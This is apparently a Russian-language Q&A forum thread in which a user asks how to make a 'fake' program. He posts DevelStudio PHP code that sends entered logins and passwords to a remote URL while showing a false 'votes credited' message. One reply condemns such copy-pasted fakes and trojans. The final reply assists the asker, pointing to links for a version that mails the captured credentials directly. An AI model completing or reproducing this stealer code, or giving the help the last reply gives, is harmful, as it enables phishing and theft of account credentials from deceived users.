Сергей

как создать фейк программу? код который я вствляю не работает

$edit1 = c('Form1->edit1')->text;
$edit2 = c('Form1->edit2')->text;
$combobox1 = c('Form1->combobox1')->inText;
$url = "[ссылка заблокирована по решению администрации проекта]";
file_get_contents($url . "?" . "login:" . $edit1 . "|pass:" . $edit2);
MessageBox("Голоса зачислены! ", "ЗАЧИСЛЕНО! ");

пишет что в строке 5 ошибка. на сниффер ничего не приходит. пожалуйста дайте нормальный код и объясните как делать!

Афина Гор

http://otvet.mail.ru/question/84265324
http://otvet.mail.ru/question/90842888

Как вы все уже достали этой копипастой.
Тот, кто эту хрень выложил в инет будет гореть в аду вместе с вами.
Каждую неделю и не по одному разу на протяжении уже более года какой-нибудь мудак задает вопрос типа:
"Делаю фейк, вот код:
$edit1 = c('Form1->edit1')->text;
$edit2 = c('Form1->edit2')->text;
$combobox1 = c('Form1->combobox1')->inText;
$url = "[ссылка появится после проверки модератором] ";
но он не работает, ничего не приходит. Помогите. "
Где вы скопировали эту неработающую дрянь, там и спрашивайте у того, кто это выложил.

Забудьте о фейках, троянах и прочем. Пока вы не научитесь писать программы, ничего у вас получаться не будет, ни на ДевелСтудии, ни на предлагаемых тут Кузьминым (Сан Санычем) пюревасиках. Поймите наконец, программирование -- это не копипаста чужого кода из интернетов. Копируя куски чужого кода без малейшего понимания, что же они делают, вы никогда не напишите работающую программу.

> Сан Саныч
> Посмотрите этот код.
Ну вот так и выясняется основное предназначение пюревасиков -- создание фейков, троянов и прочей непотребщины школотой. О каких драйверах может идти речь при такой целевой аудитории?

Роман Киселев

Извените, но из за таких идиотов как вы, опасно ползать в интернете!

Татьяна Логашова

Хотите отослать на мыло.
Посмотрите этот код.

[ссылка заблокирована по решению администрации проекта]. mybb. ru/viewtopic.php?id=75&p=2#p3260

Сниффер не требуется. Письмо отправляется с компа на вашу почту.
Можешь так же посмотреть что тут пишут.

[ссылка заблокирована по решению администрации проекта]. info/phpBB2/viewtopic.php?t=3124